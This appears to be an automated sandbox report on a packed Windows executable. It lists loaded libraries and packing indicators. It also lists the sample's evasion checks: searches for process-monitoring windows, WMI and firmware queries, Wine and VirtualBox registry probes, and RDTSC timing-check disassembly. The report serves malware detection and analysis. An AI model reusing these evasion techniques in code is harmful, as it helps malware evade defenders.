Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: 2oM46LNCOo.exe

Static file information: File size 2965504 > 1048576

Source: 2oM46LNCOo.exe

Static PE information: Raw size of wzqvdwrs is bigger than: 0x100000 < 0x2aa200

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

Unpacked PE file: 2.2.2oM46LNCOo.exe.7d0000.0.unpack :EW;.rsrc :W;.idata :W;wzqvdwrs:EW;prwatoro:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W;wzqvdwrs:EW;prwatoro:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 2oM46LNCOo.exe

Static PE information: real checksum: 0x2daa52 should be: 0x2e3c1a

Source: 2oM46LNCOo.exe	Static PE information: section name:
Source: 2oM46LNCOo.exe	Static PE information: section name: .rsrc
Source: 2oM46LNCOo.exe	Static PE information: section name: .idata
Source: 2oM46LNCOo.exe	Static PE information: section name: wzqvdwrs
Source: 2oM46LNCOo.exe	Static PE information: section name: prwatoro
Source: 2oM46LNCOo.exe	Static PE information: section name: .taggant

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Code function: 2_3_05D52164 push esi; retf	2_3_05D52167

Source: 2oM46LNCOo.exe

Static PE information: section name: entropy: 7.984225369393261

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController

Query firmware table information (likely to detect VMs)

Source: C:\Users\user\Desktop\2oM46LNCOo.exe

System information queried: FirmwareTableInformation

Jump to behavior

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: HKEY_CURRENT_USER\Software\Wine			Jump to behavior
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__			Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AC4B2 second address: 9AC4DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F6E9D0B3546h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jbe 00007F6E9D0B3538h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 push ecx 0x00000017 pop ecx 0x00000018 push edi 0x00000019 pop edi 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AC4DF second address: 9AC4E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AC4E3 second address: 9AC4E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AC4E9 second address: 9AC50F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E9CE0442Bh 0x00000009 jmp 00007F6E9CE04437h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AC50F second address: 9AC519 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AC6A0 second address: 9AC6AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F6E9CE04426h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AC970 second address: 9AC9A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B353Ah 0x00000007 jmp 00007F6E9D0B3544h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f jnc 00007F6E9D0B3554h 0x00000015 push eax 0x00000016 push edx 0x00000017 jnl 00007F6E9D0B3536h 0x0000001d jne 00007F6E9D0B3536h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AC9A7 second address: 9AC9B1 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6E9CE04426h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9A21E3 second address: 9A21F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E9D0B353Ah 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9ACB0F second address: 9ACB13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9ACB13 second address: 9ACB19 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9ACB19 second address: 9ACB1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF1B1 second address: 9AF1B6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF1B6 second address: 9AF1C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushad 0x0000000f popad 0x00000010 push esi 0x00000011 pop esi 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF1C9 second address: 9AF1CF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF1CF second address: 9AF1E3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jc 00007F6E9CE04428h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF288 second address: 9AF28D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF28D second address: 9AF2B2 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E9CE0442Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov dword ptr [ebp+122D30C6h], eax 0x00000011 push 00000000h 0x00000013 mov dl, ACh 0x00000015 push B877693Dh 0x0000001a push esi 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF2B2 second address: 9AF2B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF2B6 second address: 9AF362 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F6E9CE04426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b add dword ptr [esp], 47889743h 0x00000012 mov edi, dword ptr [ebp+122D1CC5h] 0x00000018 push 00000003h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007F6E9CE04428h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 00000017h 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 push 00000000h 0x00000036 pushad 0x00000037 mov dword ptr [ebp+122D22AAh], esi 0x0000003d jg 00007F6E9CE0442Ch 0x00000043 popad 0x00000044 push 00000003h 0x00000046 push ecx 0x00000047 movzx edi, cx 0x0000004a pop ecx 0x0000004b push 5B8EBE15h 0x00000050 jmp 00007F6E9CE04439h 0x00000055 add dword ptr [esp], 647141EBh 0x0000005c jmp 00007F6E9CE04434h 0x00000061 mov edx, dword ptr [ebp+122D2D89h] 0x00000067 lea ebx, dword ptr [ebp+1245A0E8h] 0x0000006d mov edi, dword ptr [ebp+122D2F5Dh] 0x00000073 push eax 0x00000074 push eax 0x00000075 push edx 0x00000076 jne 00007F6E9CE04428h 0x0000007c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF362 second address: 9AF368 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF368 second address: 9AF36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF421 second address: 9AF425 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF425 second address: 9AF42B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF42B second address: 9AF430 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF430 second address: 9AF447 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a push eax 0x0000000b pop eax 0x0000000c jc 00007F6E9CE04426h 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF447 second address: 9AF484 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E9D0B3536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c jmp 00007F6E9D0B3545h 0x00000011 push 00000000h 0x00000013 push eax 0x00000014 pop edx 0x00000015 call 00007F6E9D0B3539h 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F6E9D0B353Dh 0x00000021 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF484 second address: 9AF4AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pushad 0x00000004 popad 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F6E9CE0443Ch 0x00000011 jmp 00007F6E9CE04436h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF4AB second address: 9AF5AD instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E9D0B353Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e push ecx 0x0000000f jmp 00007F6E9D0B3548h 0x00000014 pop ecx 0x00000015 mov eax, dword ptr [eax] 0x00000017 pushad 0x00000018 push edx 0x00000019 jmp 00007F6E9D0B3545h 0x0000001e pop edx 0x0000001f jmp 00007F6E9D0B3545h 0x00000024 popad 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 jmp 00007F6E9D0B3546h 0x0000002e pop eax 0x0000002f jmp 00007F6E9D0B3548h 0x00000034 push 00000003h 0x00000036 push 00000000h 0x00000038 push eax 0x00000039 call 00007F6E9D0B3538h 0x0000003e pop eax 0x0000003f mov dword ptr [esp+04h], eax 0x00000043 add dword ptr [esp+04h], 0000001Ah 0x0000004b inc eax 0x0000004c push eax 0x0000004d ret 0x0000004e pop eax 0x0000004f ret 0x00000050 push 00000000h 0x00000052 mov dl, bh 0x00000054 push 00000003h 0x00000056 push esi 0x00000057 mov dword ptr [ebp+122D1DDDh], eax 0x0000005d pop esi 0x0000005e call 00007F6E9D0B3539h 0x00000063 jmp 00007F6E9D0B3549h 0x00000068 push eax 0x00000069 jmp 00007F6E9D0B353Ah 0x0000006e mov eax, dword ptr [esp+04h] 0x00000072 push eax 0x00000073 push edx 0x00000074 jbe 00007F6E9D0B353Ch 0x0000007a jnl 00007F6E9D0B3536h 0x00000080 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF5AD second address: 9AF5CD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jl 00007F6E9CE04426h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov eax, dword ptr [eax] 0x0000000e jmp 00007F6E9CE0442Ah 0x00000013 mov dword ptr [esp+04h], eax 0x00000017 pushad 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF5CD second address: 9AF61E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jmp 00007F6E9D0B3547h 0x0000000a popad 0x0000000b pop eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007F6E9D0B3538h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 0000001Ch 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 lea ebx, dword ptr [ebp+1245A0F1h] 0x0000002c mov cl, 45h 0x0000002e push eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 push eax 0x00000034 push edx 0x00000035 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF61E second address: 9AF622 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF622 second address: 9AF62C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E9D0B3536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF679 second address: 9AF67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF79C second address: 9AF7BE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c jmp 00007F6E9D0B353Fh 0x00000011 jnp 00007F6E9D0B3536h 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9AF7BE second address: 9AF7C8 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6E9CE0442Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D016A second address: 9D0174 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6E9D0B3555h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D0174 second address: 9D0197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F6E9CE04439h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D0197 second address: 9D01CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 jmp 00007F6E9D0B353Fh 0x0000000c jmp 00007F6E9D0B3548h 0x00000011 jp 00007F6E9D0B353Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9CE9C6 second address: 9CE9CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9CE9CC second address: 9CE9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9CE9D0 second address: 9CE9E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE0442Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
